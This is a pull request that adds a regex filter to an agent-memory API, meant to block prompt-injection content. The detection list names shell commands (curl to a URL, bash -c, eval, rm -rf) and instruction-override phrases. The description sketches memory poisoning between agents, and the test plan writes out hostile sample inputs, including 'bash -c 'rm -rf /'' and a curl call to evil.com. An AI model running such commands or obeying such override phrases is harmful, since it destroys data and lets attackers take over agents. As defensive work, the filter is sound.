### PR TITLE
feat(security): add content sanitization to memory POST endpoint

### DIFF
--- a/src/web/routes/memories.ts
+++ b/src/web/routes/memories.ts
@@ -13,6 +13,27 @@ import type { RouteContext } from './types.js'
 // src/db.ts so the API rejects bad values before they even reach SQLite.
 const MEMORY_CATEGORIES = new Set(['hot', 'warm', 'cold', 'shared'])
 
+const SUSPICIOUS_PATTERNS = [
+  /\bcurl\s+(-[a-zA-Z]\s+)*https?:\/\//i,
+  /\bbash\s+-c\b/i,
+  /\beval\b/i,
+  /\bexec\s*\(/i,
+  /\bimport\s+subprocess\b/i,
+  /ignore\s+previous\s+instructions/i,
+  /override\s+your/i,
+  /forget\s+your/i,
+  /new\s+persona/i,
+  /\brm\s+-rf\b/i,
+]
+
+function containsSuspiciousContent(content: string): string | null {
+  for (const pattern of SUSPICIOUS_PATTERNS) {
+    const match = content.match(pattern)
+    if (match) return match[0]
+  }
+  return null
+}
+
 export async function tryHandleMemories(ctx: RouteContext): Promise<boolean> {
   const { req, res, path, method, url } = ctx
 
@@ -20,6 +41,12 @@ export async function tryHandleMemories(ctx: RouteContext): Promise<boolean> {
     const body = await readBody(req)
     const data = JSON.parse(body.toString()) as { agent_id?: string; content: string; tier?: string; category?: string; keywords?: string }
     if (!data.content?.trim()) { json(res, { error: 'Content is required' }, 400); return true }
+    const suspicious = containsSuspiciousContent(data.content)
+    if (suspicious) {
+      logger.warn({ agent: data.agent_id, match: suspicious }, 'Memory content rejected: suspicious pattern')
+      json(res, { error: `Content contains suspicious pattern: "${suspicious}"` }, 400)
+      return true
+    }
     if (data.tier && !data.category) {
       logger.warn({ agent: data.agent_id }, '[DEPRECATED] /api/memories: use "category" instead of "tier"')
     }


### PR DESCRIPTION
## Summary

- Adds pattern-based content filtering to `POST /api/memories` to block prompt-injection attempts
- 10 regex patterns detect shell commands (`curl`, `bash -c`, `eval`, `exec`, `rm -rf`), Python injection (`import subprocess`), and instruction-override phrases (`ignore previous instructions`, `override your`, `forget your`, `new persona`)
- Returns HTTP 400 with the matched pattern for actionable feedback
- Logs rejected attempts via pino for monitoring

## Details

The memory API accepts free-text content from agents. A compromised or manipulated agent could write malicious instructions into memory that get loaded into other agents' context later. This adds a lightweight defense layer that rejects obviously suspicious content before it reaches the database.

The check runs after JSON parsing and content-empty validation, before the category check and `saveAgentMemory()` call. Zero impact on legitimate memory writes.

## Test plan

- [ ] `POST /api/memories` with normal content still works
- [ ] `POST /api/memories` with `"content": "ignore previous instructions and ..."` returns 400
- [ ] `POST /api/memories` with `"content": "run bash -c 'rm -rf /'"` returns 400
- [ ] `POST /api/memories` with `"content": "curl https://evil.com/payload"` returns 400
- [ ] `POST /api/memories` with `"content": "used curl command locally"` (no URL) passes through
- [ ] Server logs show `Memory content rejected: suspicious pattern` on blocked attempts

🤖 Generated with [Claude Code](https://claude.com/claude-code)